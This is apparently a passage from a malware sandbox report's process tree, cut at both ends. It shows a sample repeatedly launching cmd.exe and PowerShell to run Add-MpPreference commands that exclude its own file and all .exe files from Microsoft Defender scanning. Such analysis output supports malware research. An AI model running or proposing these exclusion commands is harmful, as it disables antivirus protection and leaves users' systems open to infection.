    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:540
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2608
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:348
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1048
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1544
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1928
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2604
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1356
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2808
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2336
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1248
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1568
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2388
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2424
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:872
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1436
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2736
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2880
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2628
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2956
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1616
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1564
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1868
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1676
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2604
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2816
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:112
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:728
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1728
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2900
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:580
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2440
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2088
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2124
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2960
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2204
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2524
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1584
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1780
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2272
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2260
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1972
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:944
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1532
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:772
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2136
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2892
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2080
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1936
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2052
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3060
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2712
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2852
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:348
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2756
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2704
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2268
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1940
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1668
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1844
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:976
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1212
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:568
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2328
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:1644
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:900
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2940
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3012
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2396
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:340
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:868
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2464
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1592
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of AdjustPrivilegeToken
    PID:2856
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2536
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2268
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:2628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2024
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:1940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2164
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:3064
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:2840
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:824
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:2328
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe & exit
  2⤵
  PID:1716
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionExtension .exe
    3⤵
    PID:772
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Users\Admin\AppData\Local\Temp\47a82ee0e0113c92b2c35e744ac720814320975fe5684bc19a6c6984802fd21e.exe & exit
  2⤵
  PID:2940
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
